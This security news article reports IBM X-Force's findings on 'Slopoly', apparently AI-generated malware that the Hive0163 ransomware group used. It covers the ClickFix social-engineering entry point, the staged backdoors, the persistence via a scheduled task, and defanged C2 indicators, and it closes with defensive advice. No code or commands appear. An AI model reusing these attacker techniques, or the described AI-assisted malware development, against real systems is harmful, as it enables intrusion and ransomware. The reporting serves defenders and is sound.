A significant development in the cybersecurity landscape emerged in early 2026 when IBM X-Force researchers uncovered “Slopoly,” a novel malware strain believed to be AI-generated and employed by the financially motivated threat group Hive0163. This discovery highlights a concerning acceleration in how cybercriminals are leveraging artificial intelligence, enabling them to produce sophisticated attack tools with greater speed and reduced costs. Hive0163 is known for its sophisticated operations, focusing on extensive data theft and large-scale ransomware deployments using a custom toolkit designed for persistent network access.
The Hive0163 threat group has been linked to numerous high-profile global ransomware attacks, consistently utilizing the Interlock ransomware variant. Their arsenal includes proprietary tools such as the NodeSnake backdoor, InterlockRAT, and the JunkFiction loader, all meticulously crafted to ensure prolonged access to compromised systems. Initial access to target networks is typically achieved through ClickFix attacks and malvertising campaigns, and the group is also known to engage with initial access brokers, positioning Hive0163 as a well-connected and formidable adversary in the current threat environment.
AI-Generated Malware ‘Slopoly’ Fuels Hive0163 Ransomware Attacks
IBM X-Force analysts first identified Slopoly during an active ransomware incident. The malware was discovered on an already compromised server, functioning as the client component of a bespoke command-and-control (C2) framework. It was installed in the directory C:ProgramDataMicrosoftWindowsRuntime and established persistence through a scheduled task named “Runtime Broker.” Hive0163 utilized Slopoly to maintain unauthorized access to the infected server for over a week, although the specific commands executed during this period remain unrecovered.
The internal structure of the Slopoly script exhibits distinct characteristics indicative of AI generation. These include extensive inline comments, consistent error handling mechanisms, and clearly defined variable names, all of which are common traits of code produced by large language models. Notably, the script contains an unused “Jitter” function, which may be a remnant of an iterative AI development process. Despite its own documentation within the script referring to it as a “Polymorphic C2 Persistence Client,” the malware lacks the actual capability to modify its code during execution, rendering the description both inaccurate and misleading. IBM X-Force was unable to pinpoint the specific AI model responsible for generating Slopoly, but its overall quality suggests a less advanced iteration of AI-assisted malware development.
The broader implications of this discovery extend beyond the technical specifics of Slopoly. It underscores a significant shift in the threat landscape, demonstrating that cybercriminals no longer require extensive programming expertise to create functional malware. AI tools are now capable of handling a substantial portion of this development work. Palo Alto Networks’ Unit 42, in their 2026 Global Incident Response Report released shortly after IBM’s findings, corroborated this trend, noting similar patterns of AI adoption in ransomware campaigns and validating the growing influence of artificial intelligence across the broader threat actor community.
The ClickFix Entry Point and the Attack Chain
The intrusion sequence initiated with a ClickFix attack, a sophisticated social engineering technique that deceives victims into inadvertently executing a malicious PowerShell script. Attackers deploy a deceptive, CAPTCHA-like verification page that secretly stores a harmful command within the user’s clipboard. Subsequently, the victim is prompted to press the Windows key + R, paste the clipboard content, and execute it, thereby running the malware without their knowledge or consent.
.webp)
This initial point of compromise triggered a multi-stage deployment of malicious tools. First, NodeSnake, a backdoor written in Node.js, was installed, establishing communication with a C2 server via HTTP POST requests. Following this, the more advanced InterlockRAT was deployed, introducing capabilities such as WebSocket communication, a SOCKS5 tunnel, and a reverse shell. Slopoly was introduced in the later phases of the attack, alongside other post-exploitation tools like AzCopy and Advanced IP Scanner. The C2 server associated with Slopoly was hosted on plurfestivalgalaxy[.]com (IP address 94.156.181[.]89) and displayed a login panel during its operational period.
![C2 panel displayed on plurfestivalgalaxy[.]com (Source - IBM)](https://hackernews.ae/wp-content/uploads/2026/03/C2 panel displayed on plurfestivalgalaxy[.]com (Source - IBM).webp.jpeg)
In response to these evolving threats, security teams are advised to prioritize behavior-based detection methods. AI-generated malware often represents a significant challenge for traditional signature-based detection tools that rely on identifying known code patterns. IBM X-Force recommends implementing protective measures against ClickFix attacks, such as disabling the Win+R shortcut or diligently monitoring the RunMRU registry key for any unusual entries. Furthermore, defenders should actively scan their environments for indicators of compromise associated with Hive0163, including the now-inactive Slopoly C2 domain plurfestivalgalaxy[.]com, its associated IP address 94.156.181[.]89, and other identified C2 IPs: 77.42.75[.]119, 23.227.203[.]123, and 172.86.68[.]64.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
